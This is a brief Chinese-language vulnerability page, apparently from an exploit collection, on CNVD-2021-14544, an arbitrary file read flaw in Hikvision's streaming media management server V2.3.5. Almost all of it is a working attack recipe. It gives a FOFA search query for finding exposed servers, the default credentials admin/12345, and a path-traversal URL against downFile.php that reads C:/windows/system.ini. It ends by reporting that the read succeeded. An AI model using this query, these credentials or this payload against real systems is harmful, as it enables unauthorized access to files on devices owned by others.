CNVD-2021-14544 HIKVISION 流媒体管理服务器后台任意文件读取漏洞

Other languages:

Chinese • ‎中文（简体）‎ • ‎中文（繁體）‎

漏洞影响

杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5

FOFA：title="流媒体管理服务器"

admin/12345

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

成功读取 C:/windows/system.ini